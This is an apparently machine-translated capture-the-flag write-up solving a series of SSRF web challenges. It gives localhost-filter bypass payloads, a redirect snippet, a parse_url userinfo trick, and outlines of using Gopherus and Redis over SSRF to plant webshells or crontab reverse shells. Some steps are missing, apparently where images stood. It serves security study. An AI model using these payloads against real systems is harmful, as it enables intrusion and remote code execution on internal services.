Preface
Start learning SSRF and study the article:
SSRF learning record (requires fq)
Just put the payload directly on the relatively simple topics, without explanation.
web351
url=http://127.0.0.1/flag.php
web352
The scheme must be http or https, but cannot have 127.0.0.1 or localhost. There are a lot of bypassing techniques, here are some commonly used ones:
- Base bypass
url=http://0x7F000001/flag.php - 0.0.0.0 bypass
url=http://0.0.0.0/flag.php - Short label bypassed, but my test failed for this question. Maybe it's my short label problem?
- ipv6 bypasses [::1], and this question also does not work.
- Use a period to bypass:,
url=http://127。0。0。1/flag.phpthis question also does not work. - The special address 0,, and
url=http://0/flag.php, thereurl=http://127.1/flag.phpareurl=http://127.0000000000000.001/flag.phpsuch. - In fact, dns rebinding can also be used here, but this question does not seem to work? I don't know if it is a problem with my DNS.
- There may be more, think about it and then make up.
web353
Same as above.
web354
After giving both 0 and 1 to the ban, I don’t know what to do. I read Master Yu’s blog. The original intention of this question is to replace unicode:
for i in range(128,65537):
tmp=chr(i)
try:
res = tmp.encode('idna').decode('utf-8')
#print(res)
if("-") in res:
continue
print("U:{} A:{} ascii:{} ".format(tmp, res, i))
except:
pass
IDNA (Internationalizing Domain Names in Applications) application Internationalized Domain Names
IDNA ASCII character is kind of a standard approach to a mechanism other than ASCII characters, it extracts characters from the unicode and allow non-ASCII characters to allow the use of representation . Internationalized Domain Names (IDN) was originally proposed by Martin Dusit in December 1996. In 1998, under the guidance of Professor Chen Dingwei from the National University of Singapore, Tan Juay
Kwang and Leong Kok
Yong put it into practice. After much discussion and comparison of various proposals, the application internationalized domain name (IDNA) was adopted as the official standard and used in many top-level domain names. In IDNA, "internationalized domain name" specifically refers to a domain name that can successfully convert IDNA into decimal ASCII.
But this question is not good, it is very annoying, so I use my own domain name, let him resolve to 127.0.0.1 to use.
Or use this from Master Yu:, http://sudo.cc/this is a domain name that resolves to 127.0.0.1, just use it directly.
web355
This limit has been increased:, if ((strlen($host) <= 5)) {
127.1 is definitely possible. 0 is also possible.
url=http://0/flag.php
web356
url=http://0/flag.php
0 will be parsed as 127.0.0.1 in linux system, and it will be parsed as 0.0.0.0 in windows
web357
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!');
}
echo file_get_contents($_POST['url']);
}
You can use 302 jump or dns rebinding. 302 jump has learned a new posture from Master Yu, and write one in his vps:
<?php
header("Location:http://127.0.0.1/flag.php");
Then http://xxx.xxx.xxx.xxx/xxx.phpyou can visit and learn.
Use this for dns rebinding : dns rebinding
web358
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
echo file_get_contents($url);
}
The url must start with http://ctf. and must end with show.
It’s easier to end with a show, either #show, ?a=showit’s okay .
If you start with http://ctf., @127.0.0.1you can bypass it by adding one , so that the host parsed by parse_url is 127.0.0.1, considering ftp:, ftp://user[:pass]@ip[:port]/pathso the previous ctf. will be parsed into user.
url=http://[email protected]/flag.php#show
web359
Playing mysql, the specific principles are also mentioned in the article in the preface, but it is still very troublesome to do it by hand. You need to execute the mysql statement locally, then wireshark captures the package, and then constructs gopher, which is more troublesome. Here we directly use the universal tool of ssrf:
Gopherus
Using python2, the specific operation is also very clear on github, and -help can also be checked.
The ssrf point of this question is here:
returl is the point of ssrf, but this question is not echoed, so write the shell:
encode the _ after the result: the
shell is written, and RCE can find the flag.
web360
ssrf hits redis, basically four kinds of attack methods:
- Write webshell
- Write ssh public key
- Write a contrab scheduled task reverse shell
- Master-slave replication
This question must be a shell. First use dict to detect the port and see if 6379 exists. If the target's redis changes its port, use the dict protocol to detect: For the
specific principle of redis, please refer to this article:
Analysis of Redis The use of SSRF in China
Don’t blindly use gopherus tools, first understand the principle.
For this question, I don’t need gopherus tool to get familiar with it. Let's take a
look at whether or not to authenticate:
this question is not needed, if you need it, just use bp to burst:
url=dict://127.0.0.1:6379/auth:xxx
Use: to replace spaces.
Set dir, that is, the local database storage directory:
write horses, there may be escaping or filtering, so you can usually write successfully in hexadecimal. :
Setting file:
Save:
Revisit, write success:
Just look for flag.
If you can't write anything into the shell, you need to try master-slave replication.